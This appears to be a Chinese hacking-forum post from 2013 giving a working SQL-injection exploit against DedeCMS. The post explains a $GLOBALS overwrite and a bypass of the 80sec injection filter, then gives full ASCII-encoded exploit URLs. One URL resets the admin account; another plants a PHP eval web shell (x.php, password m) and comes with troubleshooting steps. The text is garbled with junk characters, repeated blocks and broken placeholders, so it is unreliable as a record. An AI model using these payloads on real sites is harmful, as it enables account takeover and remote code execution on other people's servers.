|
|
此漏洞无视gpc转义,过80sec注入防御。% l5 G6 A, _' H1 V' U
补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?& M: P4 f2 C; k$ d; v* N
起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。
. C- }- o$ n. F) M) }4 Hinclude/dedesql.class.php1 |4 e6 {/ T5 w" I& R
if(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。6 ~; W/ ?* W9 Z7 q- K- G0 E& K
同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
5 Y" D( U h$ n3 O [而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。
! v" r2 ]/ X5 }" s# t; L. Jplus/download.php" r& c8 _) u4 o/ w% w2 K6 r- M
else if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("location link"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
9 J% q/ C% ^% sadmin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:
' a* @" q0 q- JUPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:7 v! o7 D. u7 u! k' Y5 V" G, i* H5 b, T
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin
& V( K) [. b4 Q% \漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。 ^+ X/ W1 `8 P7 K; r2 M, w
如果找不到后台,参见以前修改数据库直接拿SHELL的方法
9 }) A- N* `% @0 wUPDATE `dede_mytag` SET `normbody` = '{dede:php}file_put_contents(''spider.php'',''<!--?php eval(此漏洞无视gpc转义,过80sec注入防御。! A1 F0 z' b# R" q: y
补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?
. Q5 @7 d5 R% ^1 H起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。
4 n r; |5 h I! h0 ]: A Jinclude/dedesql.class.php
& c* g" f( b' K4 E8 M* F# aif(isset($GLOBALS['arrs1'])){ $v1 = $v2 = ''; for($i=0;isset($arrs1[$i]);$i++) { $v1 .= chr($arrs1[$i]); } for($i=0;isset($arrs2[$i]);$i++) { $v2 .= chr($arrs2[$i]); //解码ascii } $GLOBALS[$v1] .= $v2; //注意这里不是覆盖,是+}function SetQuery($sql) { $prefix="#@__"; $sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说,不明白为什么要这样做。 $this->queryString = $sql; }另外说下绕过80sec防注入的方法。; c- W2 N+ Z3 h$ i: v" m
同一文件中,有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2
~" q! ]$ q9 H, T( Z. B1 P而用ExecuteNoneQuery2执行SQL并没有防注入,于是随便找个用ExecuteNoneQuery2执行的文件。( d7 z5 X2 ^9 d4 Y ?2 N" M
plus/download.php6 b6 [2 f2 @# t) J
else if($open==1){ $id = isset($id) && is_numeric($id) ? $id : 0; $link = base64_decode(urldecode($link)); $hash = md5($link);//这里的#@_是可以控制的 $rs = $dsql->ExecuteNoneQuery2("UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' "); if($rs <= 0) { $query = " INSERT INTO `#@__downloads`(`hash`,`id`,`downloads`) VALUES('$hash','$id',1); "; $dsql->ExecNoneQuery($query); } header("locationlink"); exit();}构造SQL语句 (提交的时候用ascii加密,程序会帮我们自动解密的,所以无视gpc):
+ t8 C" b2 \$ k" l- k& \. v' Vadmin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #完整SQL语句:% b& I1 u. D; R) A
UPDATE `dede_admin` SET `userid`='spider', `pwd`='f297a57a5a743894a0e4' where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash='$hash' EXP:( z, ~& w8 _, P5 @ Y
http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35如果不出问题,后台登录用户spider密码admin( o0 U# _) r- T, s
漏洞真的不止一处,各种包含,远程代码执行,很多,列位慢慢研究。1 x9 O5 C {) i" V
如果找不到后台,参见以前修改数据库直接拿SHELL的方法
- K, z M+ P; c; ^0 S% p___FCKpd___6getshell:
% u: A( B" m" w/ Y/ Phttp://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35会在plus目录生成 x.php 密码 m
% [9 L# O* g# h, Ohttp://127.0.0.1/plus/x.php% p6 y' I& {" k3 c6 x
update成功后还要访问下 /plus/mytag_js.php?aid=1
! ?8 c7 I$ i) N失败原因:
! {; u' Q( i5 Q4 s测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)3 S4 m6 ~! y/ ?5 k2 f
配图:
4 W. }* a) i- Z6 g/ D( h1.查看dede当前版本
& `1 }4 X x+ E: a2 f3 J1 ^4 U; M6 J# K* @4 ^0 e9 G) |8 q9 L I
2.执行exp' s* ?7 U8 ]4 ?# A
4 U R$ S' _* C) T6 `) c" }http://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台1 Q0 z. X' |. u# A+ b' v
* W+ r- m5 m- A1 t$ [spider密码admin3 B: _* j! N+ P8 @4 Q0 _
$ O1 _$ H& v2 X
http://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png! R% S; c$ S8 ]) m- s" P+ w; u
原作者:imspider9 ~: R$ y2 w ~) |4 N+ X
( t! z8 n, w2 T U' ?6 d) I3 N+ n
本博客测试+配图+getshell
6 d! J E0 p0 {POST[spider]);?-->'');{/dede:php}' WHERE `aid` =1 LIMIT
0 m& K$ m% h4 `& e% S
4 R5 [( a2 k. a* ogetshell:
7 V4 V. q+ ?0 ~$ V. w6 c___FCKpd___7会在plus目录生成 x.php 密码 m" B, T8 ?" }2 u4 ^+ e
http://127.0.0.1/plus/x.php: g" V# c. `' ]$ ]4 u! T( U" A
update成功后还要访问下 /plus/mytag_js.php?aid=1
* A6 P) \4 U# S0 A8 x失败原因:/ ^- i" X* }1 o; v% P
测试发现,如果aid为空或已经生成过一次,则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49); m. K& o$ K- X5 l: X3 i B
配图:
, O ]. {- Y8 V: [' H1 L, q1.查看dede当前版本) l0 A% h4 j8 g5 @
http://www.myhack58.com/Article/UploadPic/2013-9/20139913326739.png! {: W' ^3 r/ v- z( \, J
2.执行exp
- R3 A8 T( k( U* `( g6 ehttp://www.myhack58.com/Article/UploadPic/2013-9/20139913327683.png3.测试登陆后台
4 y2 C+ r, @! K* P3 ~! i/ rspider密码admin
7 w$ A N4 w& K# chttp://www.myhack58.com/Article/UploadPic/2013-9/20139913327762.png3 J' a: V6 f6 m2 o* k9 d
1 c! T; a& P3 E& s, N; T |
|
发表于 2013-9-21 16:08:21
收藏
支持
反对